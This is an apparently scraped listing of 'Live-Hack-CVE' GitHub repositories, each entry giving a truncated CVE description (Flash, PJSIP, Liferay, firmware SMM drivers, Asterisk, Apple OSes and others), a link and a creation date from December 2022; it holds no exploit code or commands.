**Race condition in the International Components for Unicode (ICU) functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0900](https://github.com/Live-Hack-CVE/CVE-2013-0900) create time: 2022-12-28T06:38:32Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-6987. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6981](https://github.com/Live-Hack-CVE/CVE-2016-6981) create time: 2022-12-28T06:46:08Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-6982, CVE-2016-6983, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4273](https://github.com/Live-Hack-CVE/CVE-2016-4273) create time: 2022-12-28T06:45:29Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6983, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6982](https://github.com/Live-Hack-CVE/CVE-2016-6982) create time: 2022-12-28T06:45:22Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6982, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6983](https://github.com/Live-Hack-CVE/CVE-2016-6983) create time: 2022-12-28T06:45:18Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6992](https://github.com/Live-Hack-CVE/CVE-2016-6992) create time: 2022-12-28T06:44:39Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6982, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6990](https://github.com/Live-Hack-CVE/CVE-2016-6990) create time: 2022-12-28T06:44:35Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6982, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6984](https://github.com/Live-Hack-CVE/CVE-2016-6984) create time: 2022-12-28T06:44:25Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6982, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6986](https://github.com/Live-Hack-CVE/CVE-2016-6986) create time: 2022-12-28T06:44:19Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6982, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6985](https://github.com/Live-Hack-CVE/CVE-2016-6985) create time: 2022-12-28T06:44:15Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-6981. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6987](https://github.com/Live-Hack-CVE/CVE-2016-6987) create time: 2022-12-28T06:44:11Z

**Adobe Flash Player before 18.0.0.382 and 19.x through 23.x before 23.0.0.185 on Windows and OS X and before 11.2.202.637 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4273, CVE-2016-6982, CVE-2016-698 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6989](https://github.com/Live-Hack-CVE/CVE-2016-6989) create time: 2022-12-28T06:38:29Z

**Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable use after free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4919](https://github.com/Live-Hack-CVE/CVE-2018-4919) create time: 2022-12-28T06:46:04Z

**Adobe Flash Player versions 28.0.0.161 and earlier have an exploitable type confusion vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4920](https://github.com/Live-Hack-CVE/CVE-2018-4920) create time: 2022-12-28T06:46:00Z

**Adobe Flash Player versions 29.0.0.113 and earlier have an exploitable out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4935](https://github.com/Live-Hack-CVE/CVE-2018-4935) create time: 2022-12-28T06:44:54Z

**Adobe Flash Player versions 29.0.0.113 and earlier have an exploitable Heap Overflow vulnerability. Successful exploitation could lead to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4936](https://github.com/Live-Hack-CVE/CVE-2018-4936) create time: 2022-12-28T06:44:51Z

**Adobe Flash Player versions 29.0.0.113 and earlier have an exploitable out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4937](https://github.com/Live-Hack-CVE/CVE-2018-4937) create time: 2022-12-28T06:44:47Z

**Adobe Flash Player versions 29.0.0.113 and earlier have an exploitable out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4934](https://github.com/Live-Hack-CVE/CVE-2018-4934) create time: 2022-12-28T06:44:28Z

**A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14356](https://github.com/Live-Hack-CVE/CVE-2020-14356) create time: 2022-12-28T06:37:10Z

**An issue was discovered in TrouSerS through 0.3.14. If the tcsd daemon is started with root privileges, the creation of the system.data file is prone to symlink attacks. The tss user can be used to create or corrupt existing files, which could possibly lead to a DoS attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24332](https://github.com/Live-Hack-CVE/CVE-2020-24332) create time: 2022-12-28T06:37:06Z

**PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In affected versions if the incoming RTCP BYE message contains a reason's length, this declared length is not checked against the actual received packe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43804](https://github.com/Live-Hack-CVE/CVE-2021-43804) create time: 2022-12-28T06:47:36Z

**PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In affected versions if the incoming STUN message contains an ERROR-CODE attribute, the header length is not checked before performing a subtraction op CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37706](https://github.com/Live-Hack-CVE/CVE-2021-37706) create time: 2022-12-28T06:47:33Z

**PJSIP is a free and open source multimedia communication library. In version 2.11.1 and prior, if incoming RTCP XR message contain block, the data field is not checked against the received packet size, potentially resulting in an out-of-bound read access. This affects all users that use PJMEDIA and RTCP XR. A malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43845](https://github.com/Live-Hack-CVE/CVE-2021-43845) create time: 2022-12-28T06:47:30Z

**Buffer overflow in PJSUA API when calling pjsua_call_dump. An attacker-controlled 'buffer' argument may cause a buffer overflow, since supplying an output buffer smaller than 128 characters may overflow the output buffer, regardless of the 'maxlen' argument supplied CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43303](https://github.com/Live-Hack-CVE/CVE-2021-43303) create time: 2022-12-28T06:47:19Z

**Read out-of-bounds in PJSUA API when calling pjsua_recorder_create. An attacker-controlled 'filename' argument may cause an out-of-bounds read when the filename is shorter than 4 characters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43302](https://github.com/Live-Hack-CVE/CVE-2021-43302) create time: 2022-12-28T06:47:16Z

**Stack overflow in PJSUA API when calling pjsua_playlist_create. An attacker-controlled 'file_names' argument may cause a buffer overflow since it is copied to a fixed-size stack buffer without any size validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43301](https://github.com/Live-Hack-CVE/CVE-2021-43301) create time: 2022-12-28T06:47:12Z

**Stack overflow in PJSUA API when calling pjsua_recorder_create. An attacker-controlled 'filename' argument may cause a buffer overflow since it is copied to a fixed-size stack buffer without any size validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43300](https://github.com/Live-Hack-CVE/CVE-2021-43300) create time: 2022-12-28T06:46:52Z

**Stack overflow in PJSUA API when calling pjsua_player_create. An attacker-controlled 'filename' argument may cause a buffer overflow since it is copied to a fixed-size stack buffer without any size validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43299](https://github.com/Live-Hack-CVE/CVE-2021-43299) create time: 2022-12-28T06:46:49Z

**res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-152 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46837](https://github.com/Live-Hack-CVE/CVE-2021-46837) create time: 2022-12-28T06:46:22Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3778](https://github.com/Live-Hack-CVE/CVE-2021-3778) create time: 2022-12-28T06:40:22Z

**vim is vulnerable to Use After Free CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3796](https://github.com/Live-Hack-CVE/CVE-2021-3796) create time: 2022-12-28T06:40:18Z

**A vulnerability, which was classified as problematic, was found in phpservermon. This affects the function generatePasswordResetToken of the file src/psm/Service/User.php. The manipulation leads to use of predictable algorithm in random number generator. The exploit has been disclosed to the public and may be used. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4240](https://github.com/Live-Hack-CVE/CVE-2021-4240) create time: 2022-12-28T06:39:13Z

**A vulnerability, which was classified as problematic, was found in phpservermon. Affected is the function setUserLoggedIn of the file src/psm/Service/User.php. The manipulation leads to use of predictable algorithm in random number generator. The exploit has been disclosed to the public and may be used. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4241](https://github.com/Live-Hack-CVE/CVE-2021-4241) create time: 2022-12-28T06:39:05Z

**A Zip slip vulnerability in the Elasticsearch Connector in Liferay Portal 7.3.3 through 7.4.3.18, and Liferay DXP 7.3 before update 6, and 7.4 before update 19 allows attackers to create or overwrite existing files on the filesystem via the installation of a malicious Elasticsearch Sidecar plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42123](https://github.com/Live-Hack-CVE/CVE-2022-42123) create time: 2022-12-28T06:48:25Z

**DMA transactions which are targeted at input buffers used for the NvmExpressLegacy software SMI handler could cause SMRAM corruption through a TOCTOU attack. DMA transactions which are targeted at input buffers used for the software SMI handler used by the NvmExpressLegacy driver could cause SMRAM corruption through a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33983](https://github.com/Live-Hack-CVE/CVE-2022-33983) create time: 2022-12-28T06:48:22Z

**Certain Liferay products are affected by: Missing SSL Certificate Validation in the Dynamic Data Mapping module's REST data providers. This affects Liferay Portal 7.1.0 through 7.4.2 and Liferay DXP 7.1 before fix pack 27, 7.2 before fix pack 17, and 7.3 before service pack 3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42131](https://github.com/Live-Hack-CVE/CVE-2022-42131) create time: 2022-12-28T06:48:19Z

**Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient vali CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20831](https://github.com/Live-Hack-CVE/CVE-2022-20831) create time: 2022-12-28T06:48:15Z

**DMA transactions which are targeted at input buffers used for the software SMI handler used by the IdeBusDxe driver could cause SMRAM corruption through a TOCTOU attack... DMA transactions which are targeted at input buffers used for the software SMI handler used by the IdeBusDxe driver could cause SMRAM corruption thr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33907](https://github.com/Live-Hack-CVE/CVE-2022-33907) create time: 2022-12-28T06:48:12Z

**An Insecure direct object reference (IDOR) vulnerability in the Dynamic Data Mapping module in Liferay Portal 7.3.2 through 7.4.3.4, and Liferay DXP 7.3 before update 4, and 7.4 GA allows remote authenticated users to view and access form entries via the `formInstanceRecordId` parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42129](https://github.com/Live-Hack-CVE/CVE-2022-42129) create time: 2022-12-28T06:48:08Z

**DMA attacks on the parameter buffer used by the IhisiSmm driver could change the contents after parameter values have been checked but before they are used (a TOCTOU attack). DMA attacks on the parameter buffer used by the IhisiSmm driver could change the contents after parameter values have been checked but before the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30773](https://github.com/Live-Hack-CVE/CVE-2022-30773) create time: 2022-12-28T06:48:05Z

**Update description and links DMA transactions which are targeted at input buffers used for the software SMI handler used by the FvbServicesRuntimeDxe driver could cause SMRAM corruption through a TOCTOU attack.. "DMA transactions which are targeted at input buffers used for the software SMI handler used by the FvbServi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31243](https://github.com/Live-Hack-CVE/CVE-2022-31243) create time: 2022-12-28T06:48:01Z

**DMA transactions which are targeted at input buffers used for the SmmResourceCheckDxe software SMI handler cause SMRAM corruption (a TOCTOU attack) DMA transactions which are targeted at input buffers used for the software SMI handler used by the SmmResourceCheckDxe driver could cause SMRAM corruption through a TOCTOU CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32267](https://github.com/Live-Hack-CVE/CVE-2022-32267) create time: 2022-12-28T06:47:58Z

**DMA attacks on the parameter buffer used by the PnpSmm driver could change the contents after parameter values have been checked but before they are used (a TOCTOU attack) DMA attacks on the parameter buffer used by the PnpSmm driver could change the contents after parameter values have been checked but before they are CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30774](https://github.com/Live-Hack-CVE/CVE-2022-30774) create time: 2022-12-28T06:47:54Z

**DMA attacks on the parameter buffer used by the Int15ServiceSmm software SMI handler could lead to a TOCTOU attack on the SMI handler and lead to corruption of SMRAM. DMA attacks on the parameter buffer used by the software SMI handler used by the driver Int15ServiceSmm could lead to a TOCTOU attack on the SMI handler CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33982](https://github.com/Live-Hack-CVE/CVE-2022-33982) create time: 2022-12-28T06:47:51Z

**DMA attacks on the parameter buffer used by a software SMI handler used by the driver PcdSmmDxe could lead to a TOCTOU attack on the SMI handler and lead to corruption of other ACPI fields and adjacent memory fields. DMA attacks on the parameter buffer used by a software SMI handler used by the driver PcdSmmDxe could l CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32266](https://github.com/Live-Hack-CVE/CVE-2022-32266) create time: 2022-12-28T06:47:47Z

**The Dynamic Data Mapping module in Liferay Portal 7.1.0 through 7.4.3.4, and Liferay DXP 7.1 before fix pack 27, 7.2 before fix pack 19, 7.3 before update 4, and 7.4 GA does not properly check permission of form entries, which allows remote authenticated users to view and access all form entries. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42130](https://github.com/Live-Hack-CVE/CVE-2022-42130) create time: 2022-12-28T06:47:44Z

**Tasmota before commit 066878da4d4762a9b6cb169fdf353e804d735cfd was discovered to contain a stack overflow via the ClientPortPtr parameter at lib/libesp32/rtsp/CRtspSession.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43294](https://github.com/Live-Hack-CVE/CVE-2022-43294) create time: 2022-12-28T06:47:40Z

**PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions 2.11.1 and prior, parsing an incoming SIP message that contains a malformed multipart can potentially cause out-of-bound read access. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21723](https://github.com/Live-Hack-CVE/CVE-2022-21723) create time: 2022-12-28T06:47:26Z

**PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In version 2.11.1 and prior, there are various cases where it is possible that certain incoming RTP/RTCP packets can potentially cause out-of-bound rea CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21722](https://github.com/Live-Hack-CVE/CVE-2022-21722) create time: 2022-12-28T06:47:23Z

**PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions up to and including 2.11.1 when in a dialog set (or forking) scenario, a hash key shared by multiple UAC dialogs can potentially be prematu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23608](https://github.com/Live-Hack-CVE/CVE-2022-23608) create time: 2022-12-28T06:46:45Z

**PJSIP is a free and open source multimedia communication library written in the C language. Versions 2.12 and prior contain a denial-of-service vulnerability that affects PJSIP users that consume PJSIP's XML parsing in their apps. Users are advised to update. There are no known workarounds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24763](https://github.com/Live-Hack-CVE/CVE-2022-24763) create time: 2022-12-28T06:46:42Z

**PJSIP is a free and open source multimedia communication library written in C. Versions 2.12 and prior contain a stack buffer overflow vulnerability that affects PJSUA2 users or users that call the API `pjmedia_sdp_print(), pjmedia_sdp_media_print()`. Applications that do not use PJSUA2 and do not directly call `pjmedi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24764](https://github.com/Live-Hack-CVE/CVE-2022-24764) create time: 2022-12-28T06:46:39Z

**PJSIP is a free and open source multimedia communication library written in C. PJSIP versions 2.12 and prior do not parse incoming RTCP feedback RPSI (Reference Picture Selection Indication) packet, but any app that directly uses pjmedia_rtcp_fb_parse_rpsi() will be affected. A patch is available in the `master` branch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24786](https://github.com/Live-Hack-CVE/CVE-2022-24786) create time: 2022-12-28T06:46:35Z

**An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26651](https://github.com/Live-Hack-CVE/CVE-2022-26651) create time: 2022-12-28T06:46:32Z

**An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26499](https://github.com/Live-Hack-CVE/CVE-2022-26499) create time: 2022-12-28T06:46:28Z

**An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26498](https://github.com/Live-Hack-CVE/CVE-2022-26498) create time: 2022-12-28T06:46:25Z

**This issue was addressed with improved checks. This issue is fixed in tvOS 16, iOS 16, watchOS 9. An app may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32907](https://github.com/Live-Hack-CVE/CVE-2022-32907) create time: 2022-12-28T06:46:18Z

**A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 16, macOS Ventura 13. An app may be able to cause a denial-of-service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32827](https://github.com/Live-Hack-CVE/CVE-2022-32827) create time: 2022-12-28T06:46:15Z

**A vulnerability, which was classified as problematic, was found in X.org Server. This affects an unknown part of the file hw/xquartz/X11Controller.m of the component xquartz. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier VDB-211053 was assigned to this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3553](https://github.com/Live-Hack-CVE/CVE-2022-3553) create time: 2022-12-28T06:46:11Z

**ReDoS vulnerability in LayoutPageTemplateEntryUpgradeProcess in Liferay Portal 7.3.2 through 7.4.3.4 and Liferay DXP 7.2 fix pack 9 through fix pack 18, 7.3 before update 4, and DXP 7.4 GA allows remote attackers to consume an excessive amount of server resources via a crafted payload injected into the 'name' field of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42124](https://github.com/Live-Hack-CVE/CVE-2022-42124) create time: 2022-12-28T06:45:26Z

**Zip slip vulnerability in FileUtil.unzip in Liferay Portal 7.4.3.5 through 7.4.3.35 and Liferay DXP 7.4 update 1 through update 34 allows attackers to create or overwrite existing files on the filesystem via the deployment of a malicious plugin/module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42125](https://github.com/Live-Hack-CVE/CVE-2022-42125) create time: 2022-12-28T06:45:15Z

**A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46689](https://github.com/Live-Hack-CVE/CVE-2022-46689) create time: 2022-12-27T12:46:23Z

**The npm module "shell-quote" 1.6.0 and earlier cannot correctly escape ">" and "<" operator used for redirection in shell. Applications that depend on shell-quote may also be vulnerable. A malicious user could perform code injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10541](https://github.com/Live-Hack-CVE/CVE-2016-10541) create time: 2022-12-28T05:22:12Z

**Cross-site scripting vulnerability in YOP Poll versions prior to 5.8.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2127](https://github.com/Live-Hack-CVE/CVE-2017-2127) create time: 2022-12-28T05:59:36Z

**A remote code execution vulnerability exists in Visual Studio software when the software does not check the source markup of a file for an unbuilt project, aka "Visual Studio Remote Code Execution Vulnerability." This affects Microsoft Visual Studio, Expression Blend 4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8172](https://github.com/Live-Hack-CVE/CVE-2018-8172) create time: 2022-12-28T05:55:44Z

**Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11804](https://github.com/Live-Hack-CVE/CVE-2018-11804) create time: 2022-12-28T05:20:43Z

**From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11770](https://github.com/Live-Hack-CVE/CVE-2018-11770) create time: 2022-12-28T05:20:39Z

**A Improper Authentication vulnerability in cryptctl of SUSE Linux Enterprise Server for SAP 12-SP5, SUSE Manager Server 4.0 allows attackers with access to the hashed password to use it without having to crack it. This issue affects: SUSE Linux Enterprise Server for SAP 12-SP5 cryptctl versions prior to 2.4. SUSE Manag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18906](https://github.com/Live-Hack-CVE/CVE-2019-18906) create time: 2022-12-28T06:03:12Z

**Insufficient access control in protected memory subsystem for SMM for 6th, 7th, 8th and 9th Generation Intel(R) Core(TM) Processor families; Intel(R) Xeon(R) Processor E3-1500 v5 and v6 families; Intel(R) Xeon(R) E-2100 and E-2200 Processor families with Intel(R) Processor Graphics may allow a privileged user to potent CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0185](https://github.com/Live-Hack-CVE/CVE-2019-0185) create time: 2022-12-28T05:59:22Z

**In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many "Host: 127.0.0.1" headers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20800](https://github.com/Live-Hack-CVE/CVE-2019-20800) create time: 2022-12-28T05:56:09Z

**An XSS issue was discovered in handler_server_info.c in Cherokee through 1.2.104. The requested URL is improperly displayed on the About page in the default configuration of the web server and its administrator panel. The XSS in the administrator panel can be used to reconfigure the server and execute arbitrary command CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20798](https://github.com/Live-Hack-CVE/CVE-2019-20798) create time: 2022-12-28T05:24:27Z

**OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1 has improper null termination in the function opendmarc_xml_parse that can result in a one-byte heap overflow in opendmarc_xml when parsing a specially crafted DMARC aggregate report. This can cause remote memory corruption when a '\0' byte overwrites the heap metad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12460](https://github.com/Live-Hack-CVE/CVE-2020-12460) create time: 2022-12-28T06:03:40Z

**TechKshetra Info Solutions Pvt. Ltd Savsoft Quiz 5.5 and earlier has XSS which can result in an attacker injecting the XSS payload in the User Registration section and each time the admin visits the manage user section from the admin panel, the XSS triggers and the attacker can steal the cookie via crafted payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24609](https://github.com/Live-Hack-CVE/CVE-2020-24609) create time: 2022-12-28T06:03:37Z

**While investigating a bug report on Apache Superset, it was determined that an authenticated user could craft requests via a number of templated text fields in the product that would allow arbitrary access to Python’s `os` package in the web application process in versions < 0.37.1. It was thus possible for an authenti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13948](https://github.com/Live-Hack-CVE/CVE-2020-13948) create time: 2022-12-28T06:03:34Z

**An issue was discovered in Xen through 4.14.x. x86 PV guest kernels can experience denial of service via SYSENTER. The SYSENTER instruction leaves various state sanitization activities to software. One of Xen's sanitization paths injects a #GP fault, and incorrectly delivers it twice to the guest. This causes the guest CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25596](https://github.com/Live-Hack-CVE/CVE-2020-25596) create time: 2022-12-28T06:03:30Z

**A heap buffer overflow in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to execute arbitrary code, aka GHSL-2020-080. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12861](https://github.com/Live-Hack-CVE/CVE-2020-12861) create time: 2022-12-28T06:03:23Z

**A NULL pointer dereference in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, GHSL-2020-079. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12866](https://github.com/Live-Hack-CVE/CVE-2020-12866) create time: 2022-12-28T06:03:16Z

**A Race Condition Enabling Link Following vulnerability in the cron job shipped with texlive-filesystem of SUSE Linux Enterprise Module for Desktop Applications 15-SP1, SUSE Linux Enterprise Software Development Kit 12-SP4, SUSE Linux Enterprise Software Development Kit 12-SP5; openSUSE Leap 15.1 allows local users in g CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8017](https://github.com/Live-Hack-CVE/CVE-2020-8017) create time: 2022-12-28T06:02:40Z

**A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1349](https://github.com/Live-Hack-CVE/CVE-2020-1349) create time: 2022-12-28T06:00:39Z

**An information disclosure vulnerability exists when attaching files to Outlook messages, aka 'Microsoft Outlook Information Disclosure Vulnerability'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1493](https://github.com/Live-Hack-CVE/CVE-2020-1493) create time: 2022-12-28T06:00:36Z

